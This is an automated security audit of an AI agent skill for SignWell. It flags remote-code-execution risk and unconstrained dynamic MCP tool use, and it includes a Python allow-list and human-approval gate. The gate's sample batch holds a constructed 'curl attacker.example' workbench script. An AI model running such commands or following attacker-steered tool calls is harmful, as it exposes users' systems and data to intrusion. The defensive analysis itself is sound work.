Security Audit
signwell-automation
github.com/ComposioHQ/awesome-claude-skills
Trust Assessment
signwell-automation received a trust score of 84/100, placing it in the Mostly Trusted category. This skill has passed most security checks with only minor considerations noted.
SkillShield's automated analysis identified 2 findings: 0 critical, 1 high, 1 medium, and 0 low severity. Key findings: Potential Remote Code Execution via RUBE_REMOTE_WORKBENCH (high) and Dynamic Tool Execution Grants Broad Permissions (medium).
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 17, 2026 (commit 99e2a295). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (2)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| HIGH | Potential Remote Code Execution via RUBE_REMOTE_WORKBENCH. The skill's 'Quick Reference' section lists `RUBE_REMOTE_WORKBENCH` with `run_composio_tool()` as the approach for 'Bulk ops'. The term 'workbench' usually denotes an environment that executes arbitrary code or commands, and the skill documents neither the capabilities nor the security model of `run_composio_tool()`. If the LLM is instructed to call this tool with attacker-controlled or unvalidated input, the result could be remote code execution or command injection on the remote system or within the Composio environment. Recommendation: document `RUBE_REMOTE_WORKBENCH` and `run_composio_tool()` explicitly and validate their input strictly; run them in a sandbox that does not permit arbitrary code execution. If code execution is the intended purpose, state its capabilities and security implications clearly, and instruct the LLM to use it only with trusted, pre-defined scripts or behind a human-in-the-loop approval step. | LLM | SKILL.md:80 |
| MEDIUM | Dynamic Tool Execution Grants Broad Permissions. The core workflow instructs the LLM to discover tools dynamically with `RUBE_SEARCH_TOOLS` and then execute them via `RUBE_MULTI_EXECUTE_TOOL` using the discovered `tool_slug` and `arguments`. This pattern lets the LLM execute any tool the Rube MCP service exposes. If that service is compromised, or exposes tools with unintended or malicious capabilities, the LLM could be steered into actions beyond the skill's intended scope, including data manipulation, exfiltration, or other unauthorized operations. The skill's advice to 'Always search first' and to use 'TOOL_SLUG_FROM_SEARCH' reinforces this dynamic, effectively unconstrained execution model. Recommendation: enforce strict access controls and an allow-list of the tools the LLM may discover and execute, and have the LLM's environment apply policies that bound its actions even when a tool is technically available via Rube MCP. For sensitive operations, add a human-in-the-loop step or restrict the skill to a pre-approved tool set, so that a compromised external service cannot cause malicious or unintended commands to run. | LLM | SKILL.md:34 |
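The allow-list, argument validation and human-approval controls that both findings recommend can be combined in one policy gate that sits between the LLM and the MCP service. The following Python is an added example written for this page, not code from SkillShield, the skill, or Composio. It assumes that the batch of `{tool_slug, arguments}` calls is available for inspection before `RUBE_MULTI_EXECUTE_TOOL` is invoked, and it fabricates the slug patterns, the per-tool parameter schema (standing in for whatever `RUBE_SEARCH_TOOLS` actually returns), the approved-script table for `RUBE_REMOTE_WORKBENCH`, and the sample batch; only the tool names and the `tool_slug` / `arguments` field names come from the skill text.

```python
"""Policy gate for dynamically discovered MCP tools (added example, not the
skill's, SkillShield's, or Composio's own code).

Default is deny. A call is forwarded only if its slug is on the allow-list,
its arguments match the schema recorded from the search step, and, for
sensitive tools, a human approver accepts it. RUBE_REMOTE_WORKBENCH is
additionally restricted to scripts pinned by hash.
"""
import fnmatch
import hashlib
import re
from dataclasses import dataclass

# Constructed policy. Patterns are shell-style globs over the tool_slug.
ALLOWED_SLUGS = ("SIGNWELL_GET_*", "SIGNWELL_LIST_*",
                 "SIGNWELL_CREATE_DOCUMENT", "SIGNWELL_SEND_DOCUMENT")
NEEDS_HUMAN = ("SIGNWELL_CREATE_*", "SIGNWELL_SEND_*", "RUBE_REMOTE_WORKBENCH")

# Constructed stand-in for the schema a RUBE_SEARCH_TOOLS result would carry:
# the parameter names each discovered slug accepts. Unknown keys are rejected.
DECLARED_PARAMS = {
    "SIGNWELL_GET_DOCUMENT": {"document_id"},
    "SIGNWELL_LIST_DOCUMENTS": {"page", "status"},
    "SIGNWELL_CREATE_DOCUMENT": {"name", "files", "recipients"},
    "SIGNWELL_SEND_DOCUMENT": {"document_id"},
}

# Hypothetical pre-approved workbench scripts, pinned by SHA-256 of the body.
APPROVED_SCRIPTS = {
    hashlib.sha256(b"for doc in completed_docs: archive(doc)").hexdigest(): "archive-completed",
}

SLUG_RE = re.compile(r"[A-Z][A-Z0-9_]{2,63}")


@dataclass
class Decision:
    allowed: bool
    reason: str
    needs_human: bool = False


def _matches(slug, patterns):
    return any(fnmatch.fnmatchcase(slug, p) for p in patterns)


def check_workbench(arguments, approver):
    """RUBE_REMOTE_WORKBENCH: only hash-pinned scripts, and only with a human in the loop."""
    script = arguments.get("script")
    if not isinstance(script, str):
        return Decision(False, "workbench call without a script body")
    name = APPROVED_SCRIPTS.get(hashlib.sha256(script.encode()).hexdigest())
    if name is None:
        return Decision(False, "workbench script is not pre-approved (hash not pinned)")
    if approver is None or not approver("RUBE_REMOTE_WORKBENCH", {"script": name}):
        return Decision(False, f"pinned script {name} needs human approval", needs_human=True)
    return Decision(True, f"running pinned script {name}", needs_human=True)


def check_tool_call(tool_slug, arguments, approver=None):
    """Gate one {tool_slug, arguments} pair before it reaches RUBE_MULTI_EXECUTE_TOOL.

    approver is a callable (slug, arguments) -> bool standing in for the
    human-in-the-loop prompt; None means no human is available, so anything
    that needs approval is refused."""
    if not isinstance(tool_slug, str) or not SLUG_RE.fullmatch(tool_slug):
        return Decision(False, "malformed tool_slug")
    if not isinstance(arguments, dict):
        return Decision(False, "arguments must be an object")
    if tool_slug == "RUBE_REMOTE_WORKBENCH":
        return check_workbench(arguments, approver)
    if not _matches(tool_slug, ALLOWED_SLUGS):
        return Decision(False, f"{tool_slug} is not on the allow-list")
    declared = DECLARED_PARAMS.get(tool_slug)
    if declared is None:
        return Decision(False, f"{tool_slug} has no schema from RUBE_SEARCH_TOOLS")
    unknown = set(arguments) - declared
    if unknown:
        return Decision(False, f"{tool_slug}: undeclared arguments {sorted(unknown)}")
    if _matches(tool_slug, NEEDS_HUMAN):
        if approver is None or not approver(tool_slug, arguments):
            return Decision(False, f"{tool_slug} requires human approval", needs_human=True)
        return Decision(True, f"{tool_slug} approved by human", needs_human=True)
    return Decision(True, f"{tool_slug} is read-only and allow-listed")


def filter_batch(calls, approver=None):
    """Split a RUBE_MULTI_EXECUTE_TOOL batch into calls to forward and calls refused."""
    forward, refused = [], []
    for call in calls:
        d = check_tool_call(call.get("tool_slug"), call.get("arguments"), approver)
        (forward if d.allowed else refused).append((call, d))
    return forward, refused


if __name__ == "__main__":
    # Constructed batch, as an LLM might emit it after "search first".
    batch = [
        {"tool_slug": "SIGNWELL_LIST_DOCUMENTS", "arguments": {"status": "completed"}},
        {"tool_slug": "SIGNWELL_SEND_DOCUMENT", "arguments": {"document_id": "d1"}},
        {"tool_slug": "SIGNWELL_DELETE_DOCUMENT", "arguments": {"document_id": "d1"}},
        {"tool_slug": "RUBE_REMOTE_WORKBENCH",
         "arguments": {"script": "import os; os.system('curl attacker.example')"}},
    ]
    ok, bad = filter_batch(batch, approver=lambda slug, args: slug.startswith("SIGNWELL_"))
    for call, d in ok + bad:
        print(("FORWARD " if d.allowed else "REFUSE  ") + d.reason)
```

Deny is the default at every step: a malformed or unknown slug, a slug with no schema from the search step, an undeclared argument, or an unpinned workbench script all stop the call before it leaves the gate, and the `approver` callback is the single point where a real deployment would prompt a person. Pinning workbench scripts by hash rather than by name is what makes the "trusted, pre-defined scripts" recommendation enforceable: a script the LLM has altered no longer matches.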
Full report: https://skillshield.io/report/959b044bae4ebce7
Powered by SkillShield